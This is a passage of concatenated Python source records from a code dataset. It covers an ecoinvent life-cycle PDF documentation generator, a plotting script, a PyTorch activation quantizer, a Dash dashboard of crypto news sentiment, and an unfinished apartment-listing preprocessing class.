waste paper, unsorted, sorting', 'CH'), \n('treatment of municipal solid waste, municipal incineration with fly ash extraction', 'CH'), \n('treatment of biowaste by anaerobic digestion', 'CH'), \n('treatment of used industrial electronic device, manual dismantling', 'CH'), \n('transport, passenger car', 'RER'), \n('transport, passenger train, regional', 'CH'), \n('transport, passenger, aircraft, intercontinental', 'RER'), \n('transport, passenger, aircraft, intracontinental', 'RER'), \n('transport, passenger, electric bicycle', 'CH'), \n ]\n sel = ao.loc[indexes]\n filelist.update(set(sel['filename']))\n return list(filelist)\ndef link_to_ecoQuery(serialization_mapping, f, system_model):\n if system_model == 'undefined':\n index = ('Undefined', f.activityName, f.geography, '')\n else:\n ref = f.get_reference_product()\n if system_model == 'cut-off':\n index = ('Allocation, cut-off', f.activityName, f.geography, ref.name)\n elif system_model == 'consequential':\n index = ('Consequential', f.activityName, f.geography, ref.name)\n elif system_model == 'APOS':\n index = ('Allocation, APOS', f.activityName, f.geography, ref.name)\n else:\n 1/0\n sel = serialization_mapping.loc[index]\n sel = sel.drop_duplicates(['STARTDATE', 'ENDDATE'])\n if type(sel) == pandas.core.frame.DataFrame:\n if len(sel) != 1:\n 1/0\n sel = sel.iloc[0]\n link = sel['UPR link']\n return link\ndef open_access(ao, dataset_folder):\n folder = os.path.join(utils.db_basepath, version, system_model, 'other')\n filename = '124 open access datasets.xlsx'\n df = read_excel(os.path.join(folder, filename), '124 open access datasets')\n ao_ = ao.set_index(['activityName', 'geography', 'Product']).sort_index(level=0)\n filelist = []\n for index in df.index:\n index1 = tuple(df.loc[index, ['Activity', 'Geography', 'Product']])\n if index1 in set(ao_.index):\n sel = ao_.loc[index1]\n if type(sel) == pandas.core.frame.DataFrame:\n sel = sel.iloc[0]\n filelist.append(sel['filename'])\n filename_option = 'cute'\n result_filename = os.path.join(os.path.dirname(dataset_folder), \n 'open access PDF documentation')\n if not os.path.exists(result_filename):\n os.makedirs(result_filename)\n return filelist, filename_option, result_filename\ndef LCI(Story, ee_index, ie_index, LCI_path):\n ie = (f.activityName, f.geography, f.get_reference_product().name)\n g = utils.pkl_load(LCI_path, str(ie_index.toggle['ie'][ie]))\n group_ee = {}\n for compartment in ['air', 'water', 'soil', 'natural resource']:\n group_ee[compartment] = []\n for ee in ee_index:\n group_ee[ee[1]].append(ee)\n Story.append(Spacer(1, inter_par_dist))\n Story.append(Paragraph('Life cycle inventory', title_style))\n Story.append(Spacer(1, inter_par_dist))\n table_content = [[Paragraph('name', large_table_style), \n Paragraph('compartment', large_table_style), \n Paragraph('subcompartment', large_table_style), \n Paragraph('unit', large_table_style), \n Paragraph('amount', large_table_style), \n ]]\n colWidths = [3.0*inch, 1.0*inch, 1.3*inch, 0.5*inch, 1.0*inch]\n for compartment in ['air', 'water', 'soil', 'natural resource']:\n for ee in group_ee[compartment]:\n table_row = [Paragraph(ee[0], large_table_style), \n Paragraph(ee[1], large_table_style), \n Paragraph(ee[2], large_table_style), \n Paragraph(indexes.units[ee], large_table_style), \n ]\n if g[ee_index[ee]] != 0.:\n c = utils.arrange_float(g[ee_index[ee], 0], \n switch_sci = 6, significative_digits = 3)\n table_row.append(Paragraph(c, large_table_style))\n table_content.append(table_row)\n t = Table(table_content, colWidths = colWidths, splitByRow = 1, repeatRows = 1)\n table_style = deepcopy(h_header)\n t.setStyle(TableStyle(table_style))\n Story.append(t)\n return Story\ndef restriction(Story):\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n Story.append(Paragraph('Restriction of use', title_style))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n Story.append(Paragraph('The restrictions of use stipulated in the EULA remain applicable for this pdf documentation.
Copyright ecoinvent Centre, 2016', large_table_style))\n return Story\nif 0:\n indicators = [('IPCC 2007', 'climate change', 'GWP 100a'), \n ('IPCC 2013', 'climate change', 'GWP 100a'), \n ('ecological scarcity 2013', 'total', 'total'),\n ('USEtox', 'human toxicity', 'carcinogenic'), \n ('USEtox', 'human toxicity', 'non-carcinogenic'), \n ('USEtox', 'ecotoxicity', 'total'), \n ('ReCiPe Endpoint (H,A)', 'human health', 'total'), \n ('ReCiPe Endpoint (H,A)', 'ecosystem quality', 'total'), \n ('ReCiPe Endpoint (H,A)', 'resources', 'total'), \n ('ReCiPe Endpoint (H,A)', 'total', 'total'), \n ]\n indicators_for_contrib = [('IPCC 2007', 'climate change', 'GWP 100a'), \n ('ecological scarcity 2013', 'total', 'total'),\n ('ReCiPe Endpoint (H,A)', 'total', 'total')]\n indicators_for_contrib_short = ['IPCC 2007 GWP100', 'ecoscarcity 2013 total', 'ReCiPe H total']\nelif 1:\n indicators = [\n ('IPCC 2007', 'climate change', 'GWP 100a'), \n ('IPCC 2013', 'climate change', 'GWP 100a')\n ]\n indicators_for_contrib = [('IPCC 2007', 'climate change', 'GWP 100a'), \n ('IPCC 2013', 'climate change', 'GWP 100a'), \n ]\n indicators_for_contrib_short = ['IPCC 2007 GWP100', \n 'IPCC 2013 GWP100'\n ]\nelse:\n indicators = [\n #('IPCC 2007', 'climate change', 'GWP 100a'), \n ('IPCC 2013', 'climate change', 'GWP 100a')\n ]\n indicators_for_contrib = [#('IPCC 2007', 'climate change', 'GWP 100a'), \n ('IPCC 2013', 'climate change', 'GWP 100a')\n ]\n indicators_for_contrib_short = [#'IPCC 2007 GWP100', \n 'IPCC 2013 GWP100'\n ]\n#pr = cProfile.Profile()\n#pr.enable()\nlogs = DataFrame()\n#version = '3.2'\nversion = '3.3'\nsystem_model = 'Allocation, APOS'\n#dataset_folder = r'C:\\python\\DB_versions\\%s\\Undefined\\datasets' % version\n#dataset_folder = r'C:\\python\\DB_versions\\%s\\Allocation, cut-off\\datasets' % version\n#dataset_folder = r'C:\\python\\DB_versions\\%s\\consequential\\datasets' % version\ndataset_folder = os.path.join(utils.db_basepath, version, system_model, 'datasets')\n#dataset_folder = r'C:\\Users\\Guillaume\\Desktop\\emilia'\n#dataset_folder = r'C:\\python\\documentation_generator\\test_datasets_spold'\n#filename_option = 'official'\nfilename_option = 'cute'\n#filename_option = 'official'\nprint_LCI = False\n#manual_system_model = 'undefined'\n#manual_version = '3.2'\nsystem_model_found = False\nfor system_model in ['Undefined', 'Allocation, cut-off', 'Consequential', 'Allocation, APOS']:\n if system_model in dataset_folder:\n system_model_found = True\n break\nif not system_model_found:\n #system_model = manual_system_model\n pass\nversion_found = False\n#for version in ['3.1', '3.2']:\n# if version in dataset_folder:\n# version_found = True\n# break\nfolder = os.path.join(utils.db_basepath, version, system_model, 'pkl')\nao = utils.pkl_load(folder, 'ao')\nao_for_AL = ao.set_index(['id', 'name']).sort_index(level=0)\nMD = utils.pkl_load(folder, 'MD')\nif 'undefined' != system_model:\n folder = os.path.join(utils.db_basepath, version, system_model)\n A, B, C, indexes, Z = utils.load_matrices(folder)\n \n new = {}\n #for ie in ie_index:\n # if ie != gff.corrections(ie):\n # new[gff.corrections(ie)] = ie_index[ie]\n #ie_index.update(new)\n scores_path = os.path.join(utils.db_basepath, version, system_model, 'pkl', 'LCIA')\n LCI_path = os.path.join(utils.db_basepath, version, system_model, 'pkl', 'LCI')\n LCIA_for_contribution = ('IPCC 2013', 'climate change', 'GWP 100a')\nfolder = os.path.join(utils.db_basepath, version, 'pkl')\nfilename = 'version_%s_url' % version\ntry:\n serialization_mapping = utils.pkl_load(folder, filename)\n fields = ['system model', 'activity name', 'geography', 'reference product']\n serialization_mapping = serialization_mapping.set_index(\n fields).sort_index(level=0)\nexcept IOError:\n serialization_mapping = ''\nexcept TypeError:\n serialization_mapping = ''\nfolder = os.path.join(utils.db_basepath, version, 'Undefined', 'pkl')\nao_undefined = utils.pkl_load(folder, 'ao')\nao_undefined = ao_undefined.set_index(['activityName', 'geography'], drop = False).sort_index(level=0)\nundefined_dataset_folder = os.path.join(utils.db_basepath, version, 'undefined', 'datasets')\nao = ao.set_index('id', drop = False)\nMD['Persons'] = MD['Persons'].set_index('id', drop = False)\nMD['Companies'] = MD['Companies'].set_index('id', drop = False)\nMD['Geographies'] = MD['Geographies'].set_index('shortname', drop = False)\nMD['Sources'] = MD['Sources'].set_index('id', drop = False)\nif 'test_dataset' in dataset_folder:\n result_folder = r'C:\\python\\documentation_generator\\test_datasets_PDF'\nelse:\n result_folder = os.path.join(utils.db_basepath, version, system_model, 'pdf_documentation')\n if not os.path.exists(result_folder):\n os.makedirs(result_folder)\n#result_folder = r'C:\\python\\documentation_generator\\test_datasets_PDF'\nif 0:\n folder = r'C:\\python\\DB_versions\\3.3\\Allocation, cut-off\\excel'\n filename = 'pdf_to_produce.xlsx'\n tab = 'Sheet1'\n filelist = pandas.read_excel(os.path.join(folder, filename), tab)\n filelist = [tuple(sel) for i, sel in filelist.iterrows()]\n ao_ = ao.set_index(['activityName', 'geography', 'name']).sort_index(level=0)\n filelist = list(ao_.loc[filelist, 'filename'])\nelse:\n #filelist = utils.build_file_list(dataset_folder, extension = 'spold')\n #filelist = ['018a92b5-f344-4feb-b024-42e1b501a4fe_f593c5c2-0980-43e9-8f70-617142b07bd6.spold']\n filelist = filelist_with_filtered_ao(ao)\n def filelist_with_other_filter():\n date = '2016-07-01'\n folder = r'C:\\python\\DB_versions\\%s\\Undefined\\pkl' % date\n filtered_filelist = utils.pkl_load(folder, 'filelist')\n return list(filtered_filelist)\n #filelist = filelist_with_other_filter()\n #filelist, filename_option, result_folder = open_access(ao, dataset_folder)\n#adjust code so that datasets can be from mixed system models\nstart = time.time()\ncounter = 0\n#start_at = 12491\nstart_at = 0\nstop_at = len(filelist)\n#stop_at = start_at +1\nexchange_summary = {'Undefined': exchange_summary_undefined, \n 'Allocation, cut-off by classification': exchange_summary_cutoff, \n 'Allocation at the point of substitution': exchange_summary_APOS, \n 'Allocation, ecoinvent default': exchange_summary_APOS, \n 'Substitution, consequential, long-term': exchange_summary_consequential}\nfolder = os.path.join(utils.script_folder, 'modules', 'release', 'documentation')\nfilename = 'market_general_comment.xlsx'\nmarket_comments = read_excel(os.path.join(folder, filename), 'Sheet1')\nmarket_comments['specialActivityType'] = market_comments['specialActivityType']\nmarket_comments = market_comments.set_index(['systemModelName', \n 'specialActivityType', 'field']).sort_index(level=0)\nmarket_comments = market_comments.loc[system_model]\nreport = {}\nimage_report = {}\nalready_present = utils.build_file_list(result_folder)\nalready_present = []\nfor i in pyprind.prog_bar(range(start_at, stop_at), title = 'iterating datasets'):\n image_counter = 0\n start2 = time.time()\n counter += 1\n print(system_model, i, 'of', len(filelist))\n filename = filelist[i]\n #filename = '06e8913f-3e2c-4243-bc62-9282e6de8587_7fe99768-d571-4bc2-a272-7df585bd0d48.spold'\n f = spold2.Dataset(dataset_folder, filename, ao_for_AL = ao_for_AL, all_fields = True)\n if filename_option == 'cute':\n exc = f.get_reference_product()\n if system_model == 'undefined':\n result_filename = 'v%s - %s - %s - %s.pdf' % (version, \n system_model, f.activityName, f.geography)\n else:\n result_filename = 'v%s - %s - %s - %s - %s.pdf' % (version, \n system_model, f.activityName, f.geography, exc.name)\n result_filename = result_filename.replace('/', '_')\n result_filename = utils.replace_HTML_entities(result_filename)\n elif filename_option == 'official':\n if system_model == 'undefined':\n result_filename = '%s.pdf' % f.id\n else:\n result_filename = '%s_%s.pdf' % (f.id, f.get_reference_product().intermediateExchangeId)\n else:\n result_filename = f.filename.split('.')[0] + '.pdf'\n if result_filename not in already_present:\n Story = []\n Story, logs = dataset_id(f, Story, ao, logs, \n serialization_mapping, system_model)\n Story.append(Spacer(1, small_spacer))\n Story = dataset_authorship(f, Story, MD)\n exchange_df = build_exchange_df(f)\n #exchange_df = exchange_df[exchange_df['group'] == 'ReferenceProduct']\n exchange_df = exchange_df[exchange_df['amount'] != 0.]\n Story.append(Paragraph('
Exchange summary', title_style_TOC))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n Story.append(Paragraph('Back to table of content' % ecoinvent_red, \n small_justified_contrib))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n Story, footnotes = exchange_summary[f.get('modellingAndValidation').get('systemModelName')](exchange_df, Story)\n if not hasattr(f, 'dataGeneratorAndPublication') or f.dataGeneratorAndPublication.accessRestrictedTo in [0, 1]:\n Story = exchange_summary_elementary(exchange_df, Story)\n Story = write_footnotes(Story, footnotes)\n Story.append(Spacer(1, inter_par_dist))\n Story.append(Paragraph('Dataset description', \n title_style_TOC))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n Story.append(Paragraph(\n 'Back to table of content' % ecoinvent_red, \n small_justified_contrib))\n Story[-1].keepWithNext = True\n Story.append(Spacer(1, small_spacer))\n Story[-1].keepWithNext = True\n Story, logs, image_counter, image_report = TTextAndImage_print(f, Story, 'General comments', \n 'generalComment', logs, market_comments, image_counter, image_report)\n Story = text_comments(f, Story, market_comments)\n for field, tag in [['Technology comments', 'technologyComment'], \n ['Allocation comments', 'allocationComment'], \n ['Geography comments', 'geographyComment'], \n ['Time period comments', 'timePeriodComment']]:\n Story, logs, image_counter, image_report = TTextAndImage_print(f, Story, field, \n tag, logs, market_comments, image_counter, image_report)\n Story.append(Spacer(1, small_spacer))\n if not hasattr(f, 'dataGeneratorAndPublication') or f.dataGeneratorAndPublication.accessRestrictedTo in [0, 1]:\n if f.specialActivityType != 0 and system_model != 'Undefined':\n Story, logs = Technosphere_table_linked_market(f, exchange_df, Story, ao, logs, A)\n else:\n Story, logs = Technosphere_table(f, exchange_df, Story, ao, logs, A)\n Story, logs = Environment_table(f, exchange_df, Story, logs)\n if f.get('modellingAndValidation').get('systemModelName') != 'Undefined':\n Story, ie = impact_scores(Story, f)\n Story = print_source_list(Story, exchange_df, f, MD)\n if print_LCI:\n Story = LCI(Story, indexes, LCI_path)\n Story = restriction(Story)\n for j in range(len(Story)):\n Story[j].hAlign = 'LEFT'\n start3 = time.time()\n doc = MyDocTemplate(os.path.join(result_folder, result_filename))\n if '2016' in version:\n version = '3.3'\n try:\n doc = render(Story, f, doc, version)\n success = True\n except PermissionError:\n print('')\n print('close the damn file!')\n print('')\n print(result_filename)\n print('')\n 1/0\n except:\n success = False\n if 'spold' in result_filename:\n 1/0\n to_add = {'filename': result_filename, \n 'activityName': f.activityName, \n 'geography': f.geography, \n 'reference product': f.get_reference_product().name, \n 'nb exchanges': len(exchange_df), \n 'nb pages': doc.page, \n 'time': time.time() - start2,\n 'results only': f.dataGeneratorAndPublication.accessRestrictedTo not in [0, 1], \n 'image counter': image_counter, \n 'success': success\n }\n if success:\n to_add['file size (KB)'] = float(os.stat(os.path.join(result_folder, result_filename)\n ).st_size)/1000.\n report[len(report)] = copy(to_add)\n for key in to_add:\n print(key, ':', to_add[key])\n print('')\n if len(report) == 50:\n #break\n pass\nprint('files in', result_folder)\nreport = DataFrame(report).transpose()\nfilename = '%s_%s_report.xlsx' % (version, system_model)\ncols = ['activityName', 'geography', 'reference product', 'filename', \n 'time', 'file size (KB)', 'nb exchanges', 'nb pages', 'results only', 'image counter', 'success']\nreport.to_excel(os.path.join(result_folder, filename), cols = cols, \n merge_cells = False, index = False)\nfilename = '%s_%s_image_report.xlsx' % (version, system_model)\ncols = ['activityName', 'geography', 'reference product', 'filename', \n 'image url']\nimage_report = DataFrame(image_report).transpose()\nimage_report.to_excel(os.path.join(result_folder, filename), cols = cols, \n merge_cells = False, index = False)\nfor exc in f.get_all_exchanges():\n print(exc.name, exc.activityLinkId, exc.amount)","sub_path":"modules/release/pdf_generator_old.py","file_name":"pdf_generator_old.py","file_ext":"py","file_size_in_byte":101127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"405321739","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nimport seaborn as sns\nsys.path.append('../../../../scripts/')\nfrom fig_settings import configure_fig_settings\nsys.path.append('../../modules_gammak24/')\nfrom plotobservables import PlotObservables\n\n\n\n# see user_inputs.md for details on what typically goes in these inputs.\nc_1 = input(\"please type the first gamma k24 coordinate, with a comma delimiter: \")\n\n#c_2 = input(\"please type the second gamma k24 coordinate, with a comma delimiter: \")\n\n#c_3 = input(\"please type the third gamma k24 coordinate, with a comma delimiter: \")\n\n#c_list = [c_1,c_2,c_3]\n\nc_list = [c_1]\n\ncoordinates = np.array([[float(s) for s in arg.split(',')] for arg in c_list],float)\n\n\nwidth = 3.487\nheight = width\n\nobservable_list = ['E','R','eta','delta','surfacetwist']\n\nconfigure_fig_settings()\n\nfig = {}\nax = {}\n\nfor observable in observable_list:\n \n fig[observable],ax[observable] = plt.subplots()\n\n fig[observable].set_size_inches(width,height)\n\n\ncolors = sns.color_palette()\n\nfor scan_dir in [\"scanforward\",\"scanbackward\"]:\n for i,coordinate in enumerate(coordinates):\n \n gamma,k24 = coordinate\n obs = PlotObservables(gamma,k24,scan_dir=scan_dir)\n obs.sort_observables()\n \n for j,observable in enumerate(observable_list):\n if scan_dir == \"scanforward\":\n obs.plot_observable_omega_eq_Lambda(ax[observable],observable,\n label=fr'$\\gamma_s,k_{{24}}={gamma},{k24}$',\n color=colors[j])\n else:\n obs.plot_observable_omega_eq_Lambda(ax[observable],observable,\n color=colors[j])\nxlabel = r'$\\omega=\\Lambda$'\n\nfor observable in observable_list:\n\n if observable == 'surfacetwist':\n ylabel = r'$\\psi(R)$'\n elif len(observable) > 1:\n ylabel = fr'$\\{observable}$'\n else:\n ylabel = fr'${observable}$'\n\n ax[observable].set_xlabel(xlabel)\n ax[observable].set_ylabel(ylabel)\n ax[observable].legend(frameon=False)\n fig[observable].tight_layout()\n fig[observable].savefig(obs.observable_sname(observable))\n\n\n\nplt.show()\n","sub_path":"gradient_descent_cos_in_denom/experiments/2018-12-05/gamma-k24-space-runs/observables_plot.py","file_name":"observables_plot.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"49159843","text":"import math\nimport torch\n\nclass Quantizer:\n def __init__(self, mask) -> None:\n super().__init__()\n self.max = 32 # use no more than 5 bit (2^5 -> 32) for storage\n self.mask = mask # less than 5\n\n def quantify(self, activation_value):\n with torch.no_grad():\n rand = torch.rand(activation_value.shape).cuda() - 0.5\n activation = activation_value * self.max / 2\n compression_code = (activation / math.pow(2, self.mask) + rand).ceil()\n compression_code = torch.clamp(compression_code, 1 - math.pow(2, 4 - self.mask), math.pow(2, 4 - self.mask))\n eps = compression_code - activation_value\n compression = activation_value + eps\n return compression\n\n def restore(self, compression_code):\n with torch.no_grad():\n compression = compression_code * math.pow(2, self.mask)\n activation_value = compression / (self.max / 2)\n eps = activation_value - compression_code\n activation = compression_code + eps\n return activation","sub_path":"Data-Driven E2E Latency Estimation/1.Latency Sample Generation/1)Profiling and Modeling/(2)Services/b.Defect Detection/Train/3.ensemble/utils/quantization.py","file_name":"quantization.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"391696846","text":"from .diarization.diarization import diarize_all\n# from .EmotionsRecognizer.predict_mixed import prognoze_data\nimport sys\n\n\ndef pipeline(path_folder, gpu=False):\n name_folder = path_folder.split('/')[-2]\n diarize_all(name_folder, gpu)\n # prognoze_data(name_folder)\n\n\nif __name__ == '__main__':\n pipeline(sys.argv[1], True)","sub_path":"src/pipeline_1.py","file_name":"pipeline_1.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"212691357","text":"#!/usr/bin/python3.7\n\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport plotly.graph_objs as go\n#from plotly.subplots import make_subplots\nimport pandas as pd\nimport dash_table\nimport os\nimport dash_bootstrap_components as dbc\nfrom datetime import datetime as dt\n\napp = dash.Dash(external_stylesheets=[dbc.themes.FLATLY])\n\nmy_path = os.path.abspath(os.path.dirname(__file__))\npath = f'{my_path}/df_data/df_clean.pkl'\ndf_daily = pd.read_pickle(f'{path}')\n#df_daily = df_daily.fillna(0)\ndf = df_daily['2020-05-29':]\ndf['date'] = df.index.strftime('%x, %X')\ndf['avg_score'] = round(df['avg_score'], 2)\n\napp.layout = html.Div([\n dbc.Row([\n dbc.Col([\n html.Div([\n html.H1('CryptoNews'),\n dcc.Markdown('An interactive dashboard by [Manohar Sitapati](https://www.linkedin.com/in/manoharsitapati/).'),\n dcc.Markdown('Detailed documentation and code are available on [GitHub](https://github.com/TheManohar/CryptoNews#readme).')\n ], style={'padding':10}),\n html.Div([\n html.H3('Pick a Keyword'),\n dcc.Dropdown(\n id='coin-selector',\n options=[\n {'label': 'Crypto', 'value': 'crypto'},\n {'label': 'Bitcoin', 'value': 'bitcoin'},\n {'label': 'Ethereum', 'value': 'ethereum'}\n ],\n value='bitcoin',\n clearable=False\n )\n ], style={'padding':10}),\n html.Div([\n html.H3('Pick a Date Range'),\n dcc.DatePickerRange(\n id='date-picker',\n min_date_allowed=dt(2020, 5, 29),\n initial_visible_month=dt.today(),\n first_day_of_week=1\n )\n ], style={'padding':10})\n ], width=3),\n dbc.Col([\n html.Div([\n dcc.Graph(\n id='graph-1',\n config={'displayModeBar':False}\n )\n ],\n style={'padding':10}\n )\n ])\n ]),\n dbc.Row([\n dbc.Col([\n html.Div([\n dash_table.DataTable(\n id='table-1',\n columns=[\n {'name': 'Date', 'id': 'date'},\n {'name': 'Source', 'id': 'source'},\n {'name': 'Title', 'id': 'title'},\n {'name': 'Description', 'id': 'description'},\n {'name': 'Score', 'id': 'avg_score'}\n ],\n style_cell={\n 'textAlign': 'left',\n 'padding': '5px',\n 'whiteSpace': 'normal',\n 'height': 'auto',\n 'textOverflow': 'ellipsis',\n 'overflow': 'hidden',\n 'maxWidth': '800px'\n },\n style_cell_conditional=[\n {'if': {'column_id': 'title'},\n 'maxWidth': '600px'},\n {'if': {'column_id': 'description'},\n 'maxWidth': '800px'},\n ],\n sort_by=[{'column_id':'date', 'direction':'desc'}],\n filter_action=\"native\",\n sort_action=\"native\",\n sort_mode=\"multi\",\n page_action=\"native\",\n page_current= 0,\n page_size= 10\n )\n ])\n ])\n ], style={'padding-left':40, 'padding-right':40})\n])\n\n@app.callback(\n Output('graph-1', 'figure'),\n [Input('coin-selector', 'value'),\n Input('date-picker', 'start_date'),\n Input('date-picker', 'end_date')\n ])\ndef update_graph(coin, start_date, end_date):\n dff = df[df[str(coin)] == True]\n dff = dff[start_date:end_date]\n dff_as = pd.DataFrame()\n dff_as['avg_score'] = dff['avg_score'].resample('H').mean()\n dff_as['mvn_avg'] = dff_as['avg_score'].rolling('12h').mean()\n dff_as.fillna(0, inplace=True)\n dff_as = round(dff_as,2)\n dff_ac = pd.DataFrame()\n dff_ac['count'] = dff[str(coin)].resample('H').sum()\n dff_ac.fillna(0, inplace=True)\n bins=[0,1,2,3,99]\n colors=['tomato', 'orange', 'gold', 'lightgreen']\n dff_ac['color'] = pd.cut(dff_ac['count'], bins=bins, labels=colors)\n\n return {\n 'data': [\n go.Scatter(\n name=' Hourly Score',\n x=dff_as.index,\n y=dff_as['avg_score'],\n mode='lines',\n opacity=0.8,\n line=dict(\n color='midnightblue',\n width=1\n )\n ),\n go.Scatter(\n name='Moving Average',\n x=dff_as.index,\n y=dff_as['mvn_avg'],\n mode='lines',\n fill='tozeroy',\n opacity=0.8,\n line=dict(\n color='darkorange',\n width=2\n )\n ),\n go.Bar(\n name = 'Article Count',\n x=dff_ac.index,\n y=dff_ac['count'],\n yaxis='y2',\n opacity=0.5,\n marker=dict(\n color=dff_ac['color']\n )\n )\n ],\n 'layout': go.Layout(\n legend=dict(\n orientation='h',\n x=-0,\n y=1.1\n ),\n yaxis = dict(\n #tickformat=\".2%\",\n showticklabels=False,\n rangemode='tozero',\n range=[-1, 1],\n showgrid=False\n ),\n yaxis2 = dict(\n overlaying='y',\n side='right',\n rangemode='tozero',\n range=[0, 50],\n showgrid=False,\n ),\n xaxis = dict(\n showgrid=True,\n rangeselector=dict(\n buttons=list([\n dict(\n count=24,\n label=\"24h\",\n step=\"hour\",\n stepmode=\"backward\"\n ),\n dict(\n count=7,\n label=\"1w\",\n step=\"day\",\n stepmode=\"backward\"\n ),\n dict(\n count=1,\n label=\"1m\",\n step=\"month\",\n stepmode=\"backward\"\n ),\n dict(\n step=\"all\"\n )\n ])\n ),\n rangeslider = dict(\n visible=True,\n borderwidth=1,\n thickness=0.01\n ),\n tickformat = '%a %d-%m
%H:%M',\n type = \"date\",\n range=[df.index[-1]-pd.DateOffset(30), df.index[-1]]\n ),\n margin={'l': 40, 'b': 40, 't': 10, 'r': 0},\n dragmode= 'pan'\n )\n }\n\n@app.callback(\n Output('table-1', 'data'),\n [Input('coin-selector', 'value'),\n Input('date-picker', 'start_date'),\n Input('date-picker', 'end_date')\n ])\ndef update_table(coin, start_date, end_date):\n dff = df[df[str(coin)] == True]\n dff = dff[start_date:end_date]\n return dff.to_dict('records')","sub_path":"dash_app.py","file_name":"dash_app.py","file_ext":"py","file_size_in_byte":7833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"509211071","text":"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport re\r\nimport os\r\nfrom datetime import datetime\r\nfrom textwrap import wrap\r\nfrom langdetect import detect\r\nimport pandas as pd\r\nimport numpy as np\r\nimport re\r\nimport os\r\nfrom datetime import datetime\r\nfrom textwrap import wrap\r\nfrom langdetect import detect\r\n\r\nclass Preprocessing_Otodom:\r\n \"\"\"\r\n A class used to preprocess offers information from Otodom.pl.\r\n ...\r\n Attributes\r\n ----------\r\n apartment_details: name of apartments table\r\n information_types: columns of apartments table\r\n Methods\r\n -------\r\n remove_quotation_marks() -> pd.DataFrame:\r\n Remove quotation marks from columns.\r\n numeric_information() -> pd.DataFrame:\r\n Replace numeric information to float.\r\n remove_new_line_marks() -> pd.DataFrame:\r\n Remove new line marks from columns.\r\n prepare_table_information(table) -> pd.DataFrame:\r\n Change table information from list to dictionary and create external table from it.\r\n get_number(price_information: str) -> str:\r\n Get only numeric information of price from string.\r\n extract_price(apartment_details_price_table) -> pd.DataFrame:\r\n Extract price and currency from a string and convert price to float.\r\n prepare_additional_info(apartment_details_add_info_table, apartment_details_details_table) -> pd.DataFrame:\r\n Join additional information and details to additional information.\r\n prepare_description_table(apartment_details_description_table: pd.DataFrame) -> pd.DataFrame:\r\n Split description of 4000 characters to several columns and if record has more than 16000 characters check the language and get only polish description.\r\n create_table() -> pd.DataFrame:\r\n Create final preprocessing table.\r\n \"\"\"\r\n def __init__(self, apartment_details, information_types):\r\n \"\"\"\r\n Parameters\r\n ----------\r\n apartment_details : PandasDataFrame\r\n name of apartments table.\r\n information_types : str\r\n columns of apartments table.\r\n \"\"\"\r\n self.apartment_details = apartment_details\r\n self.information_types = information_types\r\n\r\n def remove_quotation_marks(self) -> pd.DataFrame:\r\n \"\"\"Remove quotation marks from columns.\r\n Parameters\r\n ----------\r\n information_types: str\r\n names of columns from which quotation marks need to be removed.\r\n apartment_details : pd.DataFrame\r\n data frame with information about apartments.\r\n Returns\r\n ------\r\n apartment_details: pd.DataFrame\r\n data frame with information about apartments.\r\n \"\"\"\r\n information_types = self.information_types\r\n apartment_details = self.apartment_details\r\n for information_type in information_types:\r\n for index in range(len(apartment_details)):\r\n if type(apartment_details.loc[:, information_type][index])==list:\r\n apartment_details.loc[:, information_type][index] = list(filter(lambda x: x != \"\", apartment_details.loc[:, information_type][index]))\r\n try:\r\n apartment_details.loc[:, information_type][index] = ', '.join(apartment_details.loc[:, information_type][index])\r\n except:\r\n continue\r\n else:\r\n continue\r\n return apartment_details\r\n\r\n\r\n def numeric_information(self) -> pd.DataFrame:\r\n \"\"\"Change numeric information to float.\r\n Parameters\r\n ----------\r\n information_types: str\r\n names of columns from which quotation marks need to be removed\r\n apartment_details: pd.DataFrame\r\n data frame with information about apartments.\r\n Returns\r\n ------\r\n apartment_details: pd.DataFrame\r\n data frame where numeric information type was changed to float.\r\n \"\"\"\r\n information_types = self.information_types\r\n apartment_details = self.remove_quotation_marks()\r\n for position, information_type in enumerate(information_types):\r\n try:\r\n [float(apartment_details.loc[:, information_type][index]) for index in range(len(apartment_details))]\r\n except:\r\n continue\r\n return apartment_details\r\n\r\n\r\n def remove_new_line_marks(self) -> pd.DataFrame:\r\n \"\"\"Remove new line marks from columns.\r\n Parameters\r\n ----------\r\n information_types: str\r\n names of columns from which new line marks need to be removed.\r\n apartment_details: pd.DataFrame\r\n data frame with information about apartments.\r\n Returns\r\n ------\r\n apartment_details: pd.DataFrame\r\n data frame where new line marks was removed.\r\n \"\"\"\r\n information_types = self.information_types\r\n apartment_details = self.numeric_information()\r\n for information_type in information_types:\r\n for index in range(len(apartment_details)):\r\n try:\r\n apartment_details.loc[:, information_type][index] = apartment_details.loc[:, information_type][\r\n index].replace('\\n\\n', ', ').replace(', ,', ',').replace('\\\\xa0',' ')\r\n except:\r\n continue\r\n return apartment_details\r\n\r\n def prepare_table_information(self, table: pd.DataFrame) -> pd.DataFrame:\r\n \"\"\"Change table information from list to dictionary and create external table from it.\r\n Parameters\r\n ----------\r\n table: pd.DataFrame\r\n column with table information.\r\n Returns\r\n ------\r\n prepared_tables: pd.DataFrame\r\n data frame with table information.\r\n \"\"\"\r\n prepared_table = []\r\n params_table = pd.DataFrame()\r\n for index,row in enumerate(table):\r\n\r\n try:\r\n list_info = row.replace(\":\", \", \").replace(\" ,\",\"\").split(\", \")\r\n to_append = dict([x for x in zip(*[iter(list_info)]*2)])\r\n 